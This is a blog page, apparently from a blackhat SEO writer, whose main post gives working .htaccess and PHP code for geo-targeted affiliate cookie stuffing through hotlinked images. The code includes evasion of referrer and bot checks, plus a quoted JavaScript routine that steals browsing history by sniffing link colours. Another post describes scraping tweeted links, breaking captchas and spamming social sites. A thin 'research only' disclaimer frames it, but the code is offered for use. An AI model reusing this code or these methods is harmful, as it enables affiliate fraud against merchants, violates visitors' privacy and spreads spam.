Home | Archive | Contact

Geo-Targeted Image Based Cookie Stuffing

July 16, 2009

People are lazy so I write this first
This (research) based post will demonstrate the techniques behind stuffing affiliate cookies via images, on any website you can post images (think forums), how to get other people to do this for you and how to geographically target cookie stuffing.

Zonk. Back in 2007 I did a post about making money with affiliates by cookie stuffing. While nobody admits to cookie stuffing, it turns out you’re all lying shits as that post gets more search traffic than anything else.

Personally, I think cookie stuffing is low, I wouldn’t recommend it or condone it. It’s probably illegal (ebay certainly think so) and you’ll probably go to hell in the afterlife.

Oh, you’ll probably get caught too if you used lame iframe techniques, so for research purposes only I want to explain how to turn cookie stuffing up a notch, if you were silly enough to do such a thing.

iFrames are so 1990s
I’d be quite happy never to see an iframe again, even though I’m sure there’s going to be a rebirth as SEOmoz said it was a possible route to sculpt pagerank after the no-follow actually doesn’t sculpt anything admission from Mr. Cutts.

Yea, so don’t use them.

Serving cookies through images
You can actually serve cookies through images (sort of). It’s a lot more sneaky and it means you can essentially serve a cookie to anywhere you can post HTML.

I’ve seen people propagate this by encouraging people to hotlink as well. So for instance, auto-generating a celebrity photo gallery and offering embed codes. Visitors merrily go about posting images all over the web while they are secretly serving cookies.

So there’s a mechanism to automatically propagate cookies all over the interwebs.

Geo-targeting cookie stuffing
Conversion rate is one (of a few) indicators that are watched to try and rumble cookie stuffers. You need to do everything you can to make sure your conversion rate is as high as possible. So, let’s start with geo-targeting. It’s no good serving cookies to Americans for ebay UK or serving ebay.com cookies for Italians. You get the idea. So detecting what country your visitor is from and serving the correct cookie increases your chance of a cookie stuff vs conversion.

Cookie stuffing images with .htaccess
Okay, we’re going to have to intercept image requests and redirect them to a script to decide if and which cookie to stuff.

The below .htaccess file will grab requests that do not originate from your site or search bots and pass them to a serveimage php file.

Options +FollowSymLinks 

RewriteEngine on 

# Let's not cookie stuff our own visitors!

RewriteCond %{HTTP_REFERER} !^$ [NC]

# If the request is outside of your site

RewriteCond %{HTTP_REFERER} !^http://([^.]+\.)?mywebsite\.com/ [NC]

# If the request is not from a few bots (pretty basic, add to this!)

RewriteCond %{HTTP_USER_AGENT} !(googlebot-image|msnbot|psbot|yahoo-mmcrawler) [NC]

# Grab the image name, extension type, go to our serveimage.php file

RewriteRule ^images/([a-zA-Z0-9]+).(bmp|gif|jpe?g|png)$ /serveimage.php?img=$1&ext=$2 [L]

Cookie stuffing images with PHP
So now we’re passing image requests to serveimage.php, you need to have the following in place:

<?php


//Get the image name from request
$ext = $_GET['ext'];
$path = "images/".$_GET['img'].".".$_GET['ext'];

	
// Decide if we should stuff our lucky visitor with a cookie

//Let's generate a random number
$rand = mt_rand(0, 1000); 

// See if it is a lucky request
// You can change percentage by changing $rand<??; 5=0.5%, 10=1%, 100=10% etc
// 10% chance to serve cookie instead of image

if ($rand<100) { cookie_stuff(); } else {spit_it_out($ext,$path);}


//Functions

// Forget it - serve them an image!

function spit_it_out($ext, $path) {
header("Cache-Control: no-cache");
header("Pragma: no-cache");
if ($ext=='jpeg'|$ext=='jpg') {
header("Content-type: image/jpeg");
} else if ($ext=='gif') {
header("Content-type: image/gif");
} else if ($ext=='bmp') {
header("Content-type: image/bmp");
} else {
header("Content-type: image/png");
}
readfile('http://'.$_SERVER["SERVER_NAME"].'/'.$path) or die("error!");
exit;
}



// We have a winner! Stuff a cookie
		
function cookie_stuff() {
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($ip)) {

// Work out what country they are in
$country = file_get_contents("http://api.hostip.info/country.php?ip=$ip"); } else {$country="US";}
if ($country=="UK") {
header('Location: http://YOUR-UKAFFILIATE-LINK'); //UK
}
elseif ($country=="CA") {
header('Location: http://YOUR-CANADA-AFFILIATE-LINK'); //CANADA
}
else {
header('Location: YOUR-USA-AFFILIATE-LINK'); //US

// Add as many countries as you want: http://www.worldatlas.com/aatlas/ctycodes.htm

}
}

?>

So this PHP code will take your hotlinker, and 10% of the time stuff an affiliate cookie for the correct country and 90% of the time correctly serve the image.

You can add as many country codes as you like, you can get a list from WorldAtlas.

I’ve personally seen people make over 1,000 per day when they get creative with cookies, obviously the deeper you stick your hand in the cookie jar, the more likely you are to get caught.

Other security measures and improvements
As the more astute among you have no doubt realised, big boy sites have more layers for detecting cookie stuffing, such as:

1) What page do people land on (always the same page being hit?)

2) How long do they stay on the site on average

3) How many / which pages do they view

4) Some sites double serve a verification file, such as a tiny gif and cross-check you have the image and the cookie

Some of the basic stuff like user agent / IP are covered in this script, but on any scale you’d need to tackle the above issues. Yes, it’s totally possible – just remember, if a human can do it in a browser, you can write a script to do it as well.

Get creative – check the browser history

If you want to raise conversion rates even further, you can check that they’ve visited the site you want to cookie stuff for. If they’ve previously visited the site, it’s much more likely they’ve got an account and are likely to buy.

Here’s some Javascript to check user history (I didn’t write this one)

var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
  "http://list.com/",
  "http://of.com/",
  "http://sites.com/",
  "http://you.com/",
  "http://want.com/",
  "http://to.com/",
  "http://check.com/",
  "http://users.com/",
  "http://history.com/",
  "http://for.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {

  var d = document.createElement('div');
  d.id = 'xss_flag';
  document.body.appendChild(d);

  var d = document.createElement('table');
  d.border = 0;
  d.cellpadding = 5;
  d.cellspacing = 10;
  d.width = '90%';
  d.align = 'center';
  d.id = 'data';
  document.body.appendChild(d);

  document.write('');
  for (var i = 0; i <>');

  /* launch steal history */

if (is_mozilla) {
  stealHistory();
}

}

function stealHistory() {

  // loop through websites and check which ones have been visited
  for (var i = 0; i < websites.length; i++) {          
         var link = document.createElement("a");       
         link.id = "id" + i;       
         link.href = websites[i];       
         link.innerHTML = websites[i];              
         document.body.appendChild(link);       
         var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");       
         document.body.removeChild(link);       
// check for visited       
     if (color == "rgb(0, 0, 255)") {           
         document.write('' + websites[i] + '');
      } // end visited check
  
  } // end visited website loop

} // end stealHistory method

I hope this post helps merchants and affiliate networks everywhere to tackle cookie stuffers. I’ll do a followup at some point explaining how to mimic user browsing behavior properley.

End thought: Web based e-mail clients can also load images. Chain mails still do well…..

Like this article? Then subscribe to the feed!

Related Posts:


Posted by Mark at 10:32pm
17 Comments

Get A Free Link In 30 Seconds

June 09, 2009

Quick heads up, if you want a free link from http://www.further.co.uk/blog all you have to do is Tweet an SEO Tip to the #fseo hashtag on Twitter.

Full details here: http://www.further.co.uk/blog/Tweet-SEO-Tips-Get-A-Link-From-Us-144

Doesn’t get much easier than that.

I’m doing a lot of blogging over there at the moment (one reason why there’s fewer updates here). So if you want more solid advice (with less blackhat), I’d recommend:

How Much Is An SEO Site Audit Worth?

SEO Keyword Selection And Calculating Value

SEO For Misspellings

The Google Sitelinks Guide

Banned In Google – The Complete Guide

Like this article? Then subscribe to the feed!

Related Posts:


Posted by Mark at 2:38pm
9 Comments

Using Twitter To Power Spam

March 03, 2009

Good afternoon and a happy square root day to you. (C’mon it’s no more made up than Valentine’s Day).

Despite my initial reservations, I’m actually finding Twitter moderately useful for content and link discovery, the trick is just really following the right people and ditching time wasters. I’m not going to bore you with a lecture on how Twitter is the next big thing, in fact I’m pretty sure we’re fast approaching the point at which Gartner’s Hype Cycles soon predict a crash of interest and disillusionment.

Twitter in the Gartner's Hype Cycle

Well, maybe, maybe not – argue it amongst yourselves, it’s not what I really want to talk about. I want to talk about…

Twitter and Spam
Although I’ve only really talked about parasite hosting indirectly, when looking at ranking factors to do with age and trust, I think it’s a point briefly worth mentioning.

I saw Quadzilla posted today about parasite hosting on twitter. Hopefully, that hasn’t eluded you, aside from other methods of finding places to parasite host all you need to look for are trusted domains that allow you to post content with little moderation. Even a basic search for Viagra shows that the #2 position is essentially a parasite hosted page on the hotfroguk directory (thanks Ryan for your dedication in trawling Viagra results).

As Quadzilla rightly points out, with Twitter being almost totally unmoderated, the sad fact is it’s going to get bombed to hell over the next 12 months by blackhat SEOs and then Google will do something about it and game over.

There are however (slightly) more legitimate uses for Twitter if you’ve got your heart set on some easy rankings.

Twitter and content generation
Content generation can be a tricky game, you can plain scrape it (not really generation :P), scrape it and spin it, you can use synonym replacement, markov chaining, or if you’re really smart – come up with your own way to do it.

There are several problems inherited with content generation, whether it’s duplicate content, poor quality or your algorithm gets skewed by internet random. I’ve seen a lot of people trying to generate websites based on data they can pull from keyword trends or “hot” trends. The problem is that most of the services give you the information you need, after the fact. The news has come, the search spike has been and you’re content generation system has given you a crummy bit of content which now has to compete with established sites with real content. Oh, and the fact nobody cares anymore.

Twitter, on the other hand is instant. It’s not uncommon for me to discover new “hot” things on twitter hours before mainstream news (i.e. authoritative sites) publish it (and days before Seth Godin makes an informed in hindsight) comment.

Without spoon feeding, I put this to you: Why not let tweeting twits find your content for you? There’s many ways you can do this:

1) There are lovely people that get this information for you. For instance: http://twitturly.com/ will give you the most tweeted links. There’s all your early breaking generic news for you, just set your cURL bot to follow those tinyurls and discover the source and scrape away.

2) If you’re in a niche, find everyone who tweets in that niche, use cURL to crawl of the links they tweet, log them to a database, use a little intelligent keyword selection to make sure their relevant, then repost.

Then of course, ping the world with your new content, break some captchas and submit to a list of social sites and drop a few links here and there. Aside from services such as Google Blog Search, which work on an almost exclusively chronological basis, you stand a good chance of getting a healthy amount of visitors since you’re one of the first few to get content up.

Added note for clarity: I’m talking about scraping titles/content from URLs you have followed from tweets – not tweets themselves. The majority of the links to new breaking / interesting stories will come inside a very small window. So if you can post this content up while there is still interest / searches and before someone has link dominance, you should even be able to give the duplicate content penalty the slip, even if you’ve 100% scraped – so you’re on a winner – you could even retweet it (:

Oh, don’t forget to jam it full or ads or something. Who cares? It’s all automated. Think of it at least as a weekend project, but don’t break Twitter, it’s growing on me (:

Like this article? Then subscribe to the feed!

Related Posts:


Posted by Mark at 9:55pm
5 Comments

Valentines Day Help

February 13, 2009

If you’re a hopeless romantic, but hopelessly busy like me, I hope this helps you with your last minute valentine’s day preparations.


Download “valentine.pdf”

Fingers crossed.

Like this article? Then subscribe to the feed!

Related Posts:


Posted by Mark at 6:32pm
3 Comments

Twitter Requests

February 12, 2009

I’ve been on twitter for probably about a year, but only really started using it recently. I’ve had quite a few emails asking what my twitter account is. So, to save some time you can find me here.

Like this article? Then subscribe to the feed!

Related Posts:


Posted by Mark at 3:00am
3 Comments